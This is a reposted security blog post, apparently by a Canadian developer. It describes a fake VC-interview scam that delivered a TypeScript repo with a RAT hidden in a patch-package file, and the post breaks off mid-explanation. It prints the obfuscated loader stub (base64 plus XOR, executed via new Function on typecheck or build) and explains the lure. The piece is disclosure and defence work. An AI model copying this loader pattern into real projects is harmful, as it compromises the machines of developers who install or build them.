RSS

Anatomy of a Failed (Nation-State?) Attack

mmastrac2 pts0 comments

Anatomy of a Failed (Nation-State?) Attack | grack

grack.com

security

Disclosures

šŸ§  This post is fully human-written: all prose with the exception of the IoC information. Because it was time-sensitive, Claude was used to accelerate the RAT analysis and build an IoC-detection script.

As I live in Canada, this information was reported to the appropriate Canadian agencies (CCCS et al). The payload-laden image does not trigger any AV engines on VirusTotal.

The attackerā€™s identity is fictitious, but there are uninvolved individuals with the same name that they may be confused for and have been omitted from this piece.

This week I came too close to falling for a fake-interview scam designed to backdoor my machine, and from the context of the emails, I assume my packages on crates.io.

Note: Iā€™m calling it the ā€œPinpinRATā€ because of some of the internal strings, but itā€™s possible this has another name out there. I couldnā€™t find any other references to it online.

A week and a half ago I received an email from ā€œDā–ˆā–ˆā–ˆā–ˆā–ˆ Sā–ˆā–ˆā–ˆā–ˆā€ claiming to be from Lua Ventures, a (unbeknownst to me at the time) defunct Singapore-based VC in the DeFi space. To be clear: this is a fabricated persona, and the name was likely chosen to be easily mistaken for one of a number of real people with the name.

It looked like a real email, including a link to a somewhat boring, but legitimate-looking LinkedIn profile.

The attacker even name-dropped two of their investments that were specifically looking for advisory work: Lyrasing and Roadpay. Searching for either of the companies wasnā€™t really a flag - they both had some very basic web presense, but nothing that would indicate they were fake rather than just early stage. (archive.org snapshot of roadpay.cc).

We went back and forth on a meeting time and eventually settled on a time we were going to chat. There was nothing odd about the call itself, either. A somewhat-difficult-to-understand man with a German accent was on the other line. He said he was taking the call while travelling which was a bit odd, but again, not necessarily a flag.

After the call came the bait. A follow-up email that offered up a ā€œtestā€.

At this point I was mildly annoyed, but not suspicious. I cloned the repo, but the first true red flag only fired here.

Where I got lucky: they sent me a TypeScript repo. It didnā€™t make sense to me. The instructions looked more like a TypeScript job interview than any sort of architecture analysis. I decided to zip up the repo and toss it into the Claude to get a quick scan - a combination of caution and laziness.

A few moments later it had identified some oddities:

Notably, the root package.json has no postinstall/preinstall hook ā€” interesting, because they use patch-package, which is normally wired to a postinstall. Let me check every package.json for lifecycle scripts, then audit the patch files (the real risk surface ā€” patches can inject arbitrary code into node_modules).

That piqued my interest. I scanned the directories myself and noticed a fairly unreasonable number of patches/ directories. The first few I checked seemed innocent enough, but as you might have guessed, they were just trying to add noise so the real payload wouldnā€™t get caught.

packages/electron-benchmarks/patches/sumchecker+3.0.1.patch<br>packages/electron-benchmarks/patches/@electron+get+2.0.3.patch<br>packages/electron-benchmarks/patches/extract-zip+2.0.1.patch

While I was checking slowly by hand, Claude identified first signs of PinpinRAT:

I found it. This is a malicious payload. Embedded in the typescript+5.9.2.patch file ā€” inside what is presented as a routine ā€œmodule specifierā€ patch to TypeScript ā€” there is a base64-blob self-executing obfuscation stub injected at the very top of both _tsc.js and typescript.js:

;;(function(r,k){const d=Buffer.from(r,'base64');for(let i=0;id.length;i+=1)d[i]^=k;return new Function('require','Buffer','WebAssembly','process','__dirname',d.toString('utf8'))(require,Buffer,WebAssembly,process,__dirname)})("YWFg...",73)/*12ff4b51*/<br>void "ticket-harbor-tsc-shim-anchor";

This decodes a base64 string, XOR-decrypts every byte with the key 73, and runs the result through new Function(ā€¦) with require, process, Buffer, etc. handed in. That is a hidden code-execution payload that fires every time tsc or anything importing typescript.js runs ā€” i.e. on the very first npm run typecheck / build / dev.

ā€¦ and thatā€™s the point where I decided to stop poking the bear on my own machine. I zipped it up with a password to stop myself from accidentally detonating it and kept running the analysis in the sandbox.

The Trap

The repo is themed as a ferry-ticketing app named ā€œTicket Harborā€. The task.txt included in the bundle was a plausible set of boring tasks, but ended with:

Run the repo typecheck, test suite, and relevant desktop/server build commands before submitting.

That instruction is the trap that gets you.

The chain works like this:

Four separate postinstall hooks run...

patch from typescript time name repo

Related Articles

US Government directive to suspend access to Fable 5 and Mythos 5

Dylan131224 ptsfable government anthropic jailbreak access mythos

Is AI ruining our skills? Early results are in ā€“ and they're not good

Michelangelo1124 ptstools skills during physicians colonoscopies tool

The Anatomy of an AI-Native Org

kiyanwang22 ptstranslated managers business translation language engineering

Apertus ā€“ Open Foundation Model for Sovereign AI

T-A16 ptsopen model apertus foundation sovereign fully

How to Earn a Billion Dollars

kingstoned15 ptsmonth become startup growth years billionaire
terms Ā· privacy Ā· disclaimer Ā· contact Ā· policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.